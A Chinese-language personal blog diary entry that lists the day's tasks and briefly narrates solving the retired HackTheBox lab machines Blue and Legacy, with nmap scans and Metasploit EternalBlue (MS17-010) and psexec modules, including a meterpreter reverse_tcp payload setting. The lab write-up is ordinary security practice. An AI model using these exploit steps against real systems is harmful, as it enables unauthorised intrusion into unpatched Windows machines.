约束订立:2021/3/29前做到心情恢复能达成正常工作效率的最低状态
推荐给各位一些歌单吧
悲伤的话就听听悲伤的歌吧,这样,就不会误以为自己在独自悲伤了
在这残酷的世界下,悲剧何其之多,吾等充其量只为其中之一而已
牢记这一点,背负痛苦然后继续前进吧
因为此时此处绝不是道路的终结
1. 上班
2. 继续学习《设计模式之禅》
3. HackTheBox Retired 【Blue】打掉 (完全没看tutorial!)
3.1 nmap
惯例nmap
1 | nmap -v -A -Pn 10.129.113.83 |
3.2 信息搜集
windows 7 professional 7601 service pack 1 exploit
直接得到一个洞
等等
这个靶机的名字就叫Blue
那tm八九不离十了吧
干干干
先去msf搜索下EternalBlue
或者MS17-010
拿到exploit/windows/smb/ms17_010_eternalblue
然后直接一套打死就完事了
4. HackTheBox Retired 【Legacy】打掉 (完全没看tutorial!)
4.1 nmap
惯例nmap
1 | nmap -v -A -Pn 10.129.123.33 |
4.2
直接用exploit/windows/smb/ms17_010_eternalblue
草草看
1 | msf6 exploit(windows/smb/ms17_010_eternalblue) > run |
哦吼。
那 设置下PAYLOAD
1 | set PAYLOAD windows/x64/meterpreter/reverse_tcp |
再来一次!
。。。还是不行吗
那 换一个。
exploit/windows/smb/ms17_010_psexec
能用。
唯一要注意的是 这机子很老 所以 放flag的文件夹和现代的windows有差距
找到文件直接type
或者more
就得了
找到合适的exp的话毫无难度
5. 看【Blue】和【Legacy】的tutorial,并复盘
看了pdf后,感觉没有任何收获……
并且没有任何可以反省的
我这次做的已经很努力了,所以没问题
啊,对了 我打Legacy似乎跟题解用的不是同一个exp,23333
看来那台机子漏洞还蛮多嘛
6. 学习1Z0-819相关课程若干
7. 改良博客样式
看见左下角的尼尔机械纪元OST和右下角的steam用户简介没^_^
- 本文作者: XenoAmess
- 本文链接: http://xenoamess.com/2021/03/26/20210325修行/
-
版权声明:
本作品采用知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议进行许可。